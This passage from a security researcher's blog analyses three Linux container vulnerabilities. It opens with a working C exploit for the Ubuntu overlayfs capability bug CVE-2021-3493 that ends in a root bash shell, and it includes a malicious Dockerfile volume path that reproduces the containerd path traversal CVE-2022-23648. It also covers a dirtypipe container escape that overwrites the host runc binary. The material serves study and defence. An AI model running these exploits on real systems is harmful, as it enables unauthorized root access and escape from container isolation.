    if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
        err(1, "open %s", dst);
    char buf[4096];
    ssize_t rd, wr;
    for (;;) {
        rd = read(fi, buf, sizeof(buf));
        if (rd == 0) {
            break;
        } else if (rd == -1) {
            if (errno == EINTR)
                continue;
            err(1, "read %s", src);
        }
        char *p = buf;
        while (rd > 0) {
            wr = write(fo, p, rd);
            if (wr == -1) {
                if (errno == EINTR)
                    continue;
                err(1, "write %s", dst);
            }
            p += wr;
            rd -= wr;
        }
    }
    close(fi);
    close(fo);
}

static int exploit()
{
    char buf[4096];
    sprintf(buf, "rm -rf '%s/'", DIR_BASE);
    system(buf);
    xmkdir(DIR_BASE, 0777);
    xmkdir(DIR_WORK, 0777);
    xmkdir(DIR_LOWER, 0777);
    xmkdir(DIR_UPPER, 0777);
    xmkdir(DIR_MERGE, 0777);
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
        err(1, "unshare");
    xwritefile("/proc/self/setgroups", "deny");
    sprintf(buf, "0 %d 1", uid);
    xwritefile("/proc/self/uid_map", buf);
    sprintf(buf, "0 %d 1", gid);
    xwritefile("/proc/self/gid_map", buf);
    sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
    if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
        err(1, "mount %s", DIR_MERGE);
    // all+ep
    char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
    xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
    if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
        err(1, "setxattr %s", BIN_MERGE);
    return 0;
}

int main(int argc, char *argv[])
{
    if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
        err(1, "execl /bin/bash");
    }
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        _exit(exploit());
    } else {
        waitpid(child, NULL, 0);
    }
    execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
    err(1, "execl %s", BIN_UPPER);
}
</code></pre></div></div>
<p>The exploit works as follows:</p>
<ol>
<li>create a child process</li>
<li>child: create the lowerdir, upperdir, workdir, mergedir</li>
<li>child: unshare to create a new mount ns and user ns, and write the uid_map and gid_map files for the new user ns</li>
<li>child: mount overlayfs in the new user ns; this only works on Ubuntu, as Ubuntu carries a patch that allows overlayfs mounts in user namespaces</li>
<li>child: copy the exploit binary to the merge directory, which actually creates a new file in upperdir</li>
<li>child: call setxattr on the exploit binary in the merge dir; this finally sets the file’s xattr in upperdir, as the second call of ‘vfs_setxattr’ sets the file’s capabilities directly</li>
<li>parent: execute the exploit binary in upperdir with the ‘shell’ argument</li>
<li>parent: setuid(0), setgid(0) and then execute a bash. As the exploit binary in upperdir has all capabilities, the setuid(0) will succeed</li>
</ol>
<h3> The fix </h3>
<p>The fix is in <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7c03e2cda4a584cadc398e8f6641ca9988a39d52">this commit</a>.
The change moves the ‘cap_convert_nscap’ permission check from ‘setxattr’ into ‘vfs_setxattr’. Thus the second call of ‘vfs_setxattr’, which uses the ext4 filesystem’s dentry, is also checked by ‘cap_convert_nscap’. Because the ext4 superblock’s user ns is the init user ns, in which the process has no ‘CAP_SETFCAP’, the check fails and the exploit no longer works.</p>
<p><img src="/assets/img/cve_2021_3493/14.png" alt="" /></p>
containerd CVE-2022-23648: path traversal never die2022-03-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/26/containerd-CVE-2022-23648
<h3> The spec </h3>
<p>Path traversal is a classic kind of security issue in the computer world. It is a logic issue, so even with the rapid development of technology this kind of issue still
appears in software. This post tries to analyze a <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2244">path traversal issue</a> in containerd which was discovered by <a href="https://twitter.com/_fel1x">Felix Wilhelm</a>. In the first part, let’s explain the related spec, so that we know what the intended behavior is and where the implementation violates it.</p>
<p>Containers have a concept of volume. If a container has no volume, the data we change in the container will disappear after the container is destroyed. In order to save data persistently or share data between containers, containers came up with the concept of volume. A volume is often (if not always) implemented using a bind mount. We can use -v in docker to add a volume.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# mkdir test
root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm -v /home/test/CVE-2022-23648/test:/test ubuntu bash
root@c201b6a39be2:/# mount | grep test
/dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
root@ecc59c1f5bc4:/# ls /test/
aaa
root@ecc59c1f5bc4:/# cat /test/aaa
data in host
root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
root@ecc59c1f5bc4:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa
data in host
data in guest
</code></pre></div></div>
<p>‘docker inspect containerid’ in the host will show the data in “Mounts”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"Mounts": [
    {
        "Type": "bind",
        "Source": "/home/test/CVE-2022-23648/test",
        "Destination": "/test",
        "Mode": "",
        "RW": true,
        "Propagation": "rprivate"
    }
],
</code></pre></div></div>
<p>The OCI image spec also has a field named ‘Volumes’. The <a href="https://github.com/opencontainers/image-spec/blob/main/config.md">definition</a> says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.</p>
<p>Let’s try to test this feature. First create a Dockerfile.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> from ubuntu:20.04
VOLUME /volume-test/
</code></pre></div></div>
<p>Build it and start a container. We can see there is a mount in the container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /volume-test/
---> Running in 2b744c0f90ff
Removing intermediate container 2b744c0f90ff
---> 1cf01e39ec82
Successfully built 1cf01e39ec82
Successfully tagged volume-test:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
root@a301238d982c:/# ls -lh /volume-test/
total 0
root@a301238d982c:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
</code></pre></div></div>
<p>‘docker inspect’ shows the mount information as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"Mounts": [
    {
        "Type": "volume",
        "Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
        "Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
        "Destination": "/volume-test",
        "Driver": "local",
        "Mode": "",
        "RW": true,
        "Propagation": ""
    }
],
</code></pre></div></div>
<p>‘docker image inspect’ shows the following info:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"Volumes": {
    "/volume-test/": {}
},
</code></pre></div></div>
<p>As we can see, the ‘Source’ is generated by the runtime itself and the ‘Destination’ is the path given to VOLUME.</p>
<p>As Felix points out, when this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md.</p>
<p>“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”</p>
<p>The point here is ‘seed the contents of the mount with data in the image at the same location’. It means that if the image has data at the mount location, the implementation should carry that original data over into the mount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
RUN mkdir /volume-test
RUN echo "volume data" > /volume-test/aaa
VOLUME /volume-test/
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
Sending build context to Docker daemon 3.584kB
Step 1/4 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/4 : RUN mkdir /volume-test
---> Using cache
---> a05c3161c55d
Step 3/4 : RUN echo "volume data" > /volume-test/aaa
---> Running in 60702a1547f5
Removing intermediate container 60702a1547f5
---> 4702775454c2
Step 4/4 : VOLUME /volume-test/
---> Running in 14963733faf9
Removing intermediate container 14963733faf9
---> cc3e2700af76
Successfully built cc3e2700af76
Successfully tagged volume-test1:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
root@20939034b463:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
root@20939034b463:/# ls /volume-test/
aaa
root@20939034b463:/# cat /volume-test/aaa
volume data
</code></pre></div></div>
<p>As we can see, the original data is in the volume. This is what ‘seeding’ the data means. If we investigate a bit more, we can see the file ‘aaa’ appears in three places.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# find /var/lib/ -name aaa
/var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
/var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
/var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa
</code></pre></div></div>
<p>The first is the ‘data’ in the volume; the second and third are the same file in the container image (the upper layer’s diff directory and the merged view). The first file is copied from the second directory.</p>
<p>Now we know how ‘VOLUME’ works from the OCI image configuration to the OCI runtime configuration. In order to seed the data, the converter needs to copy the data in the original image to the container’s mount directory.</p>
<h3> The vulnerability </h3>
<p>The vulnerability occurs in containerd’s seeding process. Say we set the VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”; then the copy becomes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/ /var/lib/docker/volumes/yyy/_data/
</code></pre></div></div>
<p>containerd tries to copy the files in the image to the volume. But it doesn’t sanitize the src, and this src can be controlled through the OCI image configuration.</p>
<p>The ‘volumeMounts’ function in ‘cri/server/container_create.go’ creates mounts from ‘Volumes’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
    ...
    var mounts []*runtime.Mount
    for dst := range config.Volumes {
        ...
        volumeID := util.GenerateID()
        src := filepath.Join(containerRootDir, "volumes", volumeID)
        // addOCIBindMounts will create these volumes.
        mounts = append(mounts, &runtime.Mount{
            ContainerPath:  dst,
            HostPath:       src,
            SelinuxRelabel: true,
        })
    }
    return mounts
}
</code></pre></div></div>
<p>The ‘ContainerPath’ can be the malicious path.</p>
<p>Later in the same function the ‘HostPath’ is cleaned, but the ‘ContainerPath’ is not.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if len(volumeMounts) > 0 {
    mountMap := make(map[string]string)
    for _, v := range volumeMounts {
        mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
    }
    opts = append(opts, customopts.WithVolumes(mountMap))
}
</code></pre></div></div>
<p>Finally, the copy happens in ‘WithVolumes’ in ‘pkg/cri/opts/container.go’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for host, volume := range volumeMounts {
    // The volume may have been defined with a C: prefix, which we can't use here.
    volume = strings.TrimPrefix(volume, "C:")
    for _, mountPath := range mountPaths {
        src := filepath.Join(mountPath, volume)
        if _, err := os.Stat(src); err != nil {
            if os.IsNotExist(err) {
                // Skip copying directory if it does not exist.
                continue
            }
            return fmt.Errorf("stat volume in rootfs: %w", err)
        }
        if err := copyExistingContents(src, host); err != nil {
            return fmt.Errorf("taking runtime copy of volume: %w", err)
        }
    }
}
</code></pre></div></div>
<p>Here ‘mountPath’ is the host directory pointing to a part of the container rootfs, ‘volume’ is the malicious path, and ‘host’ is the host directory that will be mounted into the container. The ‘src’ parameter of ‘copyExistingContents’ will look like ‘/xxx/xx/../../../../../../../../../etc’, which becomes ‘/etc/’, a path in the host filesystem. So ‘copyExistingContents’ will copy host filesystem data into the container.</p>
<p>The fix is in this <a href="https://github.com/containerd/containerd/commit/fb0b8d6177538c0da2ddd81b90b8c5e6d96f8b0f">commit</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
 		// The volume may have been defined with a C: prefix, which we can't use here.
 		volume = strings.TrimPrefix(volume, "C:")
 		for _, mountPath := range mountPaths {
-			src := filepath.Join(mountPath, volume)
+			src, err := fs.RootPath(mountPath, volume)
+			if err != nil {
+				return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+			}
 			if _, err := os.Stat(src); err != nil {
 				if os.IsNotExist(err) {
 					// Skip copying directory if it does not exist.
</code></pre></div></div>
<p>It just replaces ‘filepath.Join’ with ‘fs.RootPath’. ‘fs.RootPath’ evaluates any ‘..’ components and symlinks in ‘volume’ and bounds the result to the root directory.</p>
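<p>For intuition, here is a lexical-only sketch of that guarantee. The real ‘fs.RootPath’ also resolves symlinks on disk and keeps them inside the root, which this toy ‘boundedJoin’ does not attempt:</p>

```go
package main

import (
	"fmt"
	"path/filepath"
)

// boundedJoin re-roots an untrusted path under root: cleaning it as an
// absolute path first discards any leading ".." components, so the result
// can never lexically escape root.
func boundedJoin(root, unsafe string) string {
	return filepath.Join(root, filepath.Clean("/"+unsafe))
}

func main() {
	fmt.Println(boundedJoin("/merged", "/../../../../../../etc/ssh")) // /merged/etc/ssh
}
```

<p>Cleaning the untrusted path as if it were absolute throws away the leading ‘..’ components before the join, so the same malicious VOLUME value now stays inside the rootfs.</p>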
<h3> Reproduce </h3>
<p>The vulnerability itself is easy to understand. I failed when I tried to use docker or ctr to reproduce this issue. Fu wei, a containerd maintainer, told me I should use crictl to reproduce it, as the vulnerable code is shipped in the CRI plugin of containerd. This part is mostly about how to set up the crictl environment. In the process I asked Bonan and Fu wei a lot of questions, thanks! The setup process is mostly from <a href="https://www.yinnote.com/containerd/">this post</a>.</p>
<h4> Download crictl and set the environment </h4>
<p>In the <a href="https://github.com/kubernetes-sigs/cri-tools/releases">cri-tools release page</a> we download a v1.23.0 version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
crictl
root@ubuntu:/home/test# crictl --version
crictl version v1.23.0
</code></pre></div></div>
<p>Create a new file, /etc/crictl.yaml, and add the following configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> runtime-endpoint: unix:///var/run/containerd/containerd.sock
image-endpoint: unix:///var/run/containerd/containerd.sock
timeout: 10
debug: false
</code></pre></div></div>
<p>Create the containerd config file /etc/containerd/config.toml</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# mkdir /etc/containerd
root@ubuntu:/home/test# vi /etc/containerd/config.toml
root@ubuntu:/home/test# systemctl restart containerd
root@ubuntu:/home/test# cat /etc/containerd/config.toml
[plugins]
  [plugins.cri]
    sandbox_image = "rancher/pause:3.1"
    [plugins.cri.cni]
      bin_dir = "/opt/cni/bin"
      conf_dir = "/etc/cni/net.d"
    [plugins.cri.registry]
      [plugins.cri.registry.mirrors]
        [plugins.cri.registry.mirrors."docker.io"]
          endpoint = ["https://docker.mirrors.ustc.edu.cn"]
  [plugins.linux]
    shim = "containerd-shim"
    runtime = "runc"
    runtime_root = ""
    no_shim = false
    shim_debug = false
</code></pre></div></div>
<p>Install the CNI plugins. Download them from the <a href="https://github.com/containernetworking/plugins/releases">cni plugin page</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# mkdir -p /opt/cni/bin
root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz -C /opt/cni/bin
./
./macvlan
./static
./vlan
./portmap
./host-local
./vrf
./bridge
./tuning
./firewall
./host-device
./sbr
./loopback
./dhcp
./ptp
./ipvlan
./bandwidth
root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
{
    "cniVersion": "0.2.0",
    "name": "mynet",
    "type": "bridge",
    "bridge": "cni0",
    "isGateway": true,
    "ipMasq": true,
    "ipam": {
        "type": "host-local",
        "subnet": "10.22.0.0/16",
        "routes": [
            { "dst": "0.0.0.0/0" }
        ]
    }
}
root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
{
    "cniVersion": "0.2.0",
    "name": "lo",
    "type": "loopback"
}
</code></pre></div></div>
<h4> Create container and trigger vulnerability </h4>
<ul>
<li>
<p>Pull the pause image</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# crictl pull registry.aliyuncs.com/google_containers/pause:3.6
Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
k8s.gcr.io/pause:3.6
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
</code></pre></div> </div>
</li>
<li>
<p>Create the malicious image</p>
</li>
</ul>
<p>Build it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile
root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /../../../../../../../../etc/ssh
---> Running in 06720320c1f6
Removing intermediate container 06720320c1f6
---> b253bcd6793c
Successfully built b253bcd6793c
Successfully tagged cve-2022-23648:latest
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
VOLUME /../../../../../../../../etc/ssh
root@ubuntu:/home/test/CVE-2022-23648#
</code></pre></div></div>
<ul>
<li>
<p>Import it in containerd</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import cve-2022-23648.tar
unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
root@ubuntu:/home/test/CVE-2022-23648# crictl image
IMAGE TAG IMAGE ID SIZE
docker.io/library/cve-2022-23648 latest b253bcd6793c2 75.1MB
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
</code></pre></div> </div>
</li>
<li>
<p>Run the malicious image</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
3bf95742d0fb3 10 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
ba2d0c46c5502 docker.io/library/cve-2022-23648:latest 14 seconds ago Running test 0 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
root@ubuntu:/# ls /etc/ssh/
root@ubuntu:/# ls /etc/ssh
</code></pre></div> </div>
</li>
</ul>
<p>Emmm, no host data. What’s wrong? From this <a href="https://ubuntu.com/security/CVE-2022-23648">page</a>, we can see my containerd is already fixed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# containerd --version
containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2
root@ubuntu:/home/test# which containerd
/usr/bin/containerd
root@ubuntu:/home/test# stat /usr/bin/containerd
File: /usr/bin/containerd
Size: 60305392 Blocks: 117784 IO Block: 4096 regular file
Device: 805h/2053d Inode: 5769129 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2022-03-25 23:43:13.235999616 -0700
Modify: 2022-02-25 12:15:25.000000000 -0800
Change: 2022-03-14 06:37:43.871583849 -0700
Birth: -
</code></pre></div></div>
<ul>
<li>
<p>Install a lower version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
Stopped sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
Removed sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
1ecc6bee60024 4 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
fe4ef77ab8e31 docker.io/library/cve-2022-23648:latest 7 seconds ago Running test 0 1ecc6bee60024
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
root@ubuntu:/# ls /etc/ssh
host_file ssh_config ssh_config.d
root@ubuntu:/# cat /etc/ssh/host_file
host
root@ubuntu:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# containerd --version
containerd github.com/containerd/containerd 1.3.3-0ubuntu2
</code></pre></div> </div>
</li>
</ul>
<p>Finally, we have reproduced this vulnerability.</p>
<h3> The end </h3>
<p>After reproducing this vulnerability, I wanted to know why docker and ctr don’t work, and discussed it a lot with Fu wei. Here are some conclusions I made (not sure whether they are 100% accurate):</p>
<p>CRI is the interface between Kubernetes and the container runtime. OCI is the spec of how to run a container. So there needs to be some software between CRI and OCI. This software needs to implement the CRI interface towards Kubernetes, and it also needs to convert CRI requests to the low-level OCI spec and launch containers. containerd and cri-o are this kind of software. Kubernetes can also use docker to run containers, but it needs dockershim to interact with docker through the CRI interface.</p>
<ul>
<li>containerd. containerd is a container runtime that can be used to manage containers. containerd does not just expose the CRI interface, but also other container management interfaces.</li>
<li>ctr. ctr is the client test tool of containerd; it is not related to CRI at all.</li>
<li>crictl. crictl is a CLI for CRI-compatible container runtimes. It can interact with a CRI runtime to manage containers.</li>
<li>docker. docker is not related to CRI; it is just another container management tool.</li>
</ul>
<p>As the vulnerability is in the CRI plugin of containerd, we can only trigger it through the CRI path. In this post I used crictl to trigger it. It can also be triggered in a Kubernetes cluster that uses containerd as the CRI runtime.</p>
<h3> Reference </h3>
<p><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2244">containerd: Insecure handling of image volumes</a></p>
<p><a href="https://www.yinnote.com/containerd/">使用containerd单独创建容器</a></p>
Container escape using dirtypipe2022-03-19T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/19/container-escape-through-dirtypipe
<h3> Background </h3>
<p>The story begins with the picture that Yuval Avrahami showed on <a href="https://twitter.com/yuvalavra/status/1500978532494843912/photo/1">twitter</a>. Here it is:</p>
<p><img src="/assets/img/containerescapedirtypipe/1.jpg" alt="" /></p>
<p>It means we can write host files in the /bin directory by using dirtypipe, even though dirtypipe in fact just modifies the file’s page cache.</p>
<p>Then security researchers at Moresec also wrote a <a href="https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2OnUA">post</a> showing the capability of using dirtypipe to do container escape.
Some other researchers, such as <a href="https://twitter.com/drivertomtt/status/1504504067975909376">drivertom</a>, also did this successfully.</p>
<p>During busy working days I had no time to do more experiments; I just discussed the point with some friends. Anyway, at first glance it seems dirtypipe can’t be used to
do container escape. It is not difficult to understand that dirtypipe can change files in other containers, as containers may share some layer files. But as far as I know,
‘/proc/self/exe’ is the only file that interacts with the host filesystem. However, since CVE-2019-5736, the runc binary is cloned into memory by memfd_create, and
it seems we can only overwrite the cloned binary, not the actual runc binary in the host filesystem.</p>
<p>So how did these guys achieve container escape using dirtypipe? Bonan, another excellent cloud native security researcher, mentioned that maybe the memfd_create file is copy-on-write.
Then the cloned and the host runc binary may share the same physical pages; as dirtypipe modifies the cloned file’s page cache, it would also affect the host runc binary. This sounds quite plausible.
I became more convinced that ‘the cloned and host runc binary share the same physical pages’ is the reason after digging into the internals of the ‘memfd_create’ and ‘sendfile’ syscalls.</p>
<h3> Experiment </h3>
<p>If our guess is right, we can stop the escape by reading the runc binary and writing it into the memfd_create file, so that the memfd_create file and the host runc file don’t share physical pages.
Anyway, this is just a guess; we need to prove it. First, let’s try to escape and overwrite the runc binary from a container.</p>
<p>This is easy to achieve by combining the widely available CVE-2019-5736 PoC and the dirtypipe PoC. After getting the read-only runc fd, we can use dirtypipe to overwrite it.</p>
<p>Before the escape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# mv runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
70df137b272bd8fb1e3e63e90d77943a /usr/sbin/runc
</code></pre></div></div>
<p>After the escape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
687765833647de6091b82896fe90844a /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# head -c 20 /usr/sbin/runc
ELdirtypipe>root@ubuntu:/home/test/go/src/runc# runc --version
bash: /usr/sbin/runc: cannot execute binary file: Exec format error
</code></pre></div></div>
<p>As we can see, the host binary is modified, so we can do container escape using dirtypipe.
So let’s do the second experiment: don’t use sendfile, but just use a read-and-write copy (deep copy). Fortunately the runc code already has both methods;
we can easily test this by commenting out the sendfile call. The patch is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--- a/libcontainer/nsenter/cloned_binary.c
+++ b/libcontainer/nsenter/cloned_binary.c
@@ -507,13 +507,14 @@ static int clone_binary(void)
 		goto error_binfd;
 	while (sent < statbuf.st_size) {
-		int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
-		if (n < 0) {
+		//int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
+		int n = 0;
+		//if (n < 0) {
 			/* sendfile can fail so we fallback to a dumb user-space copy. */
 			n = fd_to_fd(execfd, binfd);
 			if (n < 0)
 				goto error_binfd;
-		}
+		//}
 		sent += n;
</code></pre></div></div>
<p>After compiling the new runc, the output shows as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
8a5acd21ac5099abf40c15c815c97de1 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
ece16f4f8aa1518d95a19e9c5b2cb66b /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
bash: /usr/sbin/runc: cannot execute binary file: Exec format error
</code></pre></div></div>
<p>Emmm, interesting: the runc binary is still modified. We need to go into the runc code to find the truth. After a moment, a suspicious function
appears. ‘clone_binary’ calls ‘try_bindfd’ to get an execfd; if ‘try_bindfd’ succeeds, ‘sendfile’ and ‘fd_to_fd’ will never be executed.
The comment is quite clear: the copying is executed only when ‘try_bindfd’ fails.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int clone_binary(void)
{
    int binfd, execfd;
    struct stat statbuf = { };
    size_t sent = 0;
    int fdtype = EFD_NONE;

